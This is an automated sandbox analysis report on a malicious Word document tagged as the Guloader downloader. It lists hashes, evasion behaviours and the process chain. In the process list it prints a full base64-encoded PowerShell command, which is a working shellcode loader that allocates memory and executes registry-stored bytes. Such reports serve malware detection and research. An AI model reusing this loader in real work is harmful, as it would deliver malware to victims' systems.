Analysis
-
max time kernel
1779s -
max time network
1797s -
platform
windows10_x64 -
resource
win10-20220414-en -
submitted
05-07-2022 17:13
Static task
static1
Behavioral task
behavioral1
Sample
statement_gateCSV0902221-22-10.doc
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
statement_gateCSV0902221-22-10.doc
Resource
win10-20220414-en
General
-
Target
statement_gateCSV0902221-22-10.doc
-
Size
548KB
-
MD5
b0f5d6be788659aad5a859d61af1ba94
-
SHA1
daa8f29996e3bbc742d1d914befb0edc67057290
-
SHA256
434720a8844eb8f5f8f6eb6323c53a7776d3979a52c4214d1c2b0a4331db9ad0
-
SHA512
dafdffafe50cf43616b98fce60c8e507dcd2a93a599d18142d4c40cec523c1800679ced2af43e8faa2f7f3a970e011918dca595e6f6352796d6447692aea670c
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.exeieinstal.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
ieinstal.exepid process 3484 ieinstal.exe 3484 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeieinstal.exepid process 1408 powershell.exe 3484 ieinstal.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1408 set thread context of 3484 1408 powershell.exe ieinstal.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 1276 WINWORD.EXE 1276 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 1408 powershell.exe 1408 powershell.exe 1408 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1408 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 1276 WINWORD.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
WINWORD.EXEpid process 1276 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
WINWORD.EXEpid process 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE 1276 WINWORD.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exepowershell.execsc.exedescription pid process target process PID 2396 wrote to memory of 1408 2396 WScript.exe powershell.exe PID 2396 wrote to memory of 1408 2396 WScript.exe powershell.exe PID 2396 wrote to memory of 1408 2396 WScript.exe powershell.exe PID 1408 wrote to memory of 3492 1408 powershell.exe csc.exe PID 1408 wrote to memory of 3492 1408 powershell.exe csc.exe PID 1408 wrote to memory of 3492 1408 powershell.exe csc.exe PID 3492 wrote to memory of 1444 3492 csc.exe cvtres.exe PID 3492 wrote to memory of 1444 3492 csc.exe cvtres.exe PID 3492 wrote to memory of 1444 3492 csc.exe cvtres.exe PID 1408 wrote to memory of 3484 1408 powershell.exe ieinstal.exe PID 1408 wrote to memory of 3484 1408 powershell.exe ieinstal.exe PID 1408 wrote to memory of 3484 1408 powershell.exe ieinstal.exe PID 1408 wrote to memory of 3484 1408 powershell.exe ieinstal.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\statement_gateCSV0902221-22-10.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1276
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\bilb.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAHIAbQBtAGUAYwBlACAAVABpAGQAcwBmAG8AcgBzAGkANQAgAGUAcQB1AGEAbAAgAHMAcABpAGQAbgAgAEYAQQBMAEQASABKACAAUwBUAEEAVQBOAEMAIABEAEEATgBHAEwARQAgAFQAeQBuAGQAcwBsAGkANgAgAFIAZQBtAHIAOAAgAEUAawBzAGkAIABOAG8AcgBkAGgAYQB2AG4AZQBuACAAZwBlAG4AawAgAHMAYwBoAHcAZQBpACAAaQBuAGQAZwByAGEAdgBlAGQAZQAgAFUAcgB0AGUAcwB1ACAATQB5AHgAbwAgAFMAbwBuAGEAbgB0ACAAVQBNAE8AUgBBAEwASQAgAEIAVQBTAEwASQBOACAAbwB2AGUAcgBsAGEAdQAgAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAGwAYQBuAGcAcwB2AHIAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQQBjAGEAcwBhACgAaQBuAHQAIABsAGEAbgBnAHMAdgByADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAHIAZQBhAGMALABpAG4AdAAgAFMAaABpAG4AOQAsAHIAZQBmACAASQBuAHQAMwAyACAAbABhAG4AZwBzAHYAcgAsAGkAbgB0ACAAcwBlAGMAZQByAG4AZQAsAGkAbgB0ACAAbABhAG4AZwBzAHYAcgA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBBACgAdQBpAG4AdAAgAFMAaABpAG4AOQA1ACwAaQBuAHQAIABTAGgAaQBuADkANgAsAGkAbgB0ACAAUwBoAGkAbgA5ADcALABpAG4AdAAgAFMAaABpAG4AOQA4ACwAaQBuAHQAIABTAGgAaQBuADkAOQApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABTAGgAaQBuADkAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBoAGkAbgA5ADIALABpAG4AdAAgAFMAaABpAG4AOQAzACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAHMAZQBkAGEAdABpAHYAZQAgAEEAUwBTAEUAUwBTAE8AUgBTAEgAIABEAGUAaQBuAHMAIABiAG8AdABhAG4AaQBzAGsAZQB2ACAATgBBAFQASABPACAATgBhAHQAaQBvAG4AYQBsADgAIABuAHkAdAB0AGkAZwAgAEcAeQBkAGUAcABsADkAIABLAGkAYwBrAG8AdQB0AHIAZQBzADMAIABWAEEAUgBBAE4AIABkAGkAbQBlACAAQgBhAG4AZQBnAGEAYQByADUAIABjAGUAbQBiACAAVAB5AHAAZQBjAGgAZQBjAGsAOQAgAEYAbwByAGUAYgB5AGcAZwBlACAAYwByAGUAcAB5AHMAbAB2ACAATQBhAGgAbwBpAHQAcgBlAG8AcAAyACAAUABvAGwAeQBwAGwAYQBzACAATgBBAFQASQBPAE4AQQBMAE0AIABSAGIAYQByAGUANAAgAFkAcABzAGkANwAgAHMAdABpAHYAZgByACAAQwBhAHkAbQA0ACAAbABpAG4AagBlAHIAaQBuAGcAIAB4AGUAcgBvAHMAZQBzAGsAbwAgACAADQAKACQAbABhAG4AZwBzAHYAcgAzAD0AMAA7AA0ACgAkAGwAYQBuAGcAcwB2AHIAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABsAGEAbgBnAHMAdgByADgAPQBbAGwAYQBuAGcAcwB2AHIAMQBdADoAOgBBAGMAYQBzAGEAKAAtADEALABbAHIAZQBmAF0AJABsAGEAbgBnAHMAdgByADMALAAwACwAWwByAGUAZgBdACQAbABhAG4AZwBzAHYAcgA5ACwAMQAyADIAOAA4ACwANgA0ACkADQAKACQAUwBjAGEAYgBpAD0AKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAEkATgBJAE0AIgApAC4AUwB1AG4AZAByAA0ACgANAAoAJABEAGUAdABlAGsAdABlAHIAZQBkADcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdAF0AOgA6AEMAcgBlAGEAdABlAEkAbgBzAHQAYQBuAGMAZQAoAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAF0ALAAkAFMAYwBhAGIAaQAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBjAGEAYgBpAC4ATABlAG4AZwB0AGgAOwAgACQAaQArAD0AMgApAA0ACgAJAHsADQAKACAAIAAgACAAIAAgACAAIAAkAEQAZQB0AGUAawB0AGUAcgBlAGQANwBbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAYwBhAGIAaQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAyACkALAAgADEANgApAA0ACgAgACAAIAAgAH0ADQAKAA0ACgANAAoAZgBvAHIAKAAkAEMAcgBlAG4AOAA9ADAAOwAgACQAQwByAGUAbgA4ACAALQBsAHQAIAAkAEQAZQB0AGUAawB0AGUAcgBlAGQANwAuAGMAbwB1AG4AdAAgADsAIAAkAEMAcgBlAG4AOAArACsAKQANAAoAewANAAoACQANAAoAWwBsAGEAbgBnAHMAdgByADEAXQA6ADoAUgB0AGwATQBvAHYAZQBNAGUAbQBvAHIAeQAoACQAbABhAG4AZwBzAHYAcgAzACsAJABDAHIAZQBuADgALABbAHIAZQBmAF0AJABEAGUAdABlAGsAdABlAHIAZQBkADcAWwAkAEMAcgBlAG4AOABdACwAMQApAA0ACgANAAoAfQANAAoAWwBsAGEAbgBnAHMAdgByADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAEEAKAAkAGwAYQBuAGcAcwB2AHIAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA=="2⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0d50k31\d0d50k31.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC94.tmp" "c:\Users\Admin\AppData\Local\Temp\d0d50k31\CSC51BEBFFF24EC4774BE549B17CDE086A.TMP"4⤵PID:1444
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"3⤵
- Checks QEMU agent file
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3484
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD56f2ea8bd00bf06f1efd682adf731503b
SHA162657d9fbb82b5b6de082f427feb5893da192598
SHA25611d81f663b005bc7ad459ca7656ab5d4090723591c9f6b3c84b3db02eb1a8906
SHA512295055a1c74f9221b7fde0a557707efad9201ac1246c8bc998bd0bc870ce221f79c07356301bbec38fe0634c926d1e17438ff07c3b4ece6100833807fd14517a
-
Filesize
3KB
MD511fc485435be1ea7ee28a6077fe372a0
SHA12c1e627a9c7736bcac7d893da0fd8d3f32e09fe6
SHA25667d362ae8488bdd4b0704022590c3944ac74f2f4e23295ffdfa930ac6200f5c0
SHA51223e5f665d8eae48d45265c011d2e5c3c0475bb82b9cce94bee11970133445d64b251e1bd84829fab46f55ccbfaa99087ae2f689bcfe7c120a2f472349fd488fd
-
Filesize
248KB
MD5c5517debb620db30d9d540e8c8c2b136
SHA1314fd5ff832ef2ad1e8a9ec9b51df2410d492968
SHA256a442bd2d1014b15a32d8113d78a4d7b3843d7af28981cd842348cbd3ffd11fc5
SHA5123f65c1fd7d5bd15dfd456b2dbcc22fb153a0c7f4274d454bbff93c985930217307e72c133cb63d47199138c2ee47cca0252874b790ad9d8f616b6234e527ea3a
-
Filesize
652B
MD532ef86b4e3d5e2bc7cfe17de4550620b
SHA1d46d34eeee86f3056ee14c21e3af96404a234c29
SHA25664a2ce6099994f046adfbf8c451ec171eed0af301336807d3062b9f1b47d6c27
SHA512094dc5001b43e53cc204bd81895e55ba6c6a51cec32f9b63cf64bd2ce7669d1ad9a5a72feb5d019ae1544477a55651f5873116c3a9219af9b511013a9cc49ead
-
Filesize
508B
MD592f532cb0b2fde496d0062039e781562
SHA1e2dc5e937dd8ffeca772d4c9faf0b5dbbbdb6002
SHA2568e5e474123610d866a81d72dddc961867243d18c18c4fc77ae34fded295ee8e6
SHA512e7747046ea788c2ae010f32b6336ceb708b165fe06fe8caa94c93106b9491595e0507aa88c3379bbbc7f4df8c0212a7e92e578bb8a92e27fc9967510536d6cc0
-
Filesize
369B
MD51e36f866ef6c2c9485d3ca3fb7948c62
SHA1ab0f22ddca280bc00a200bea77d7ac49dafbbebb
SHA25636f9e59b6c9f152047289f0719d4ff93cd9b298d5ed9ac867688ccbba49bdf66
SHA512246fa4fd0fadb9a90903df5de911a96de82dfd349d8a27dd3a92df3c2b54dceed5a5436e6ed450b382785036765ba3ba45cfdbb7583dd3c3281b17401e53df63